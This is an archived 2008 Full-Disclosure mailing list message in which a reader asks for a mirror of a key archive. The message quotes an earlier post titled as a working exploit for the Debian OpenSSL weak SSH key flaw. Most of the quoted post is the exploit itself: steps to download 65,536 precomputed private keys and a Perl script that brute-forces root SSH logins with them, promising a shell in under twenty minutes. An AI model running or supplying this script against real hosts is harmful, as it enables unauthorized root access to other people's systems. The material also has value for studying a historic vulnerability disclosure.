lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sun, 18 May 2008 11:13:48 -0400
From: "bob harley" <bobb.harley@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Working exploit for Debian generated SSH Keys

Anyone have a copy of
rsa.2048.tar.bzip2<http://www.deadbeef.de/rsa.2048.tar.bzip2>?
The web server isn't playing nicely  ;-)

On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm@...dbeef.de> wrote:

> Hi full-disclosure,
>
> the debian openssl issue leads that there are only 65.536 possible ssh
> keys generated, cause the only entropy is the pid of the process
> generating the key.
>
> This leads to that the following perl script can be used with the
> precalculated ssh keys to brute force the ssh login. It works if such a
> keys is installed on a non-patched debian or any other system manual
> configured to.
>
> On an unpatched system, which doesn't need to be debian, do the following:
>
> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>
> 2. Extract it to a directory
>
> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
> Bits, generated on an upatched debian (this is the key this exploit will
> break)
>
> 4. Run the perl script and give it the location to where you extracted
> the bzip2 mentioned.
>
> #!/usr/bin/perl
> my $keysPerConnect = 6;
> unless ($ARGV[1]) {
>   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
>   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>   print "By mm@...dbeef.de\n";
>   exit 0;
> }
> chdir($ARGV[0]);
> opendir(A, $ARGV[0]) || die("opendir");
> while ($_ = readdir(A)) {
>   chomp;
>   next unless m,^\d+$,;
>   push(@a, $_);
>   if (scalar(@a) > $keysPerConnect) {
>      system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
> ".$_ } @a)." ".$ARGV[1]);
>      @a = ();
>   }
> }
>
> 5. Enjoy the shell after some minutes (less than 20 minutes)
>
> Regards,
> Markus Mueller
> mm@...dbeef.de
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists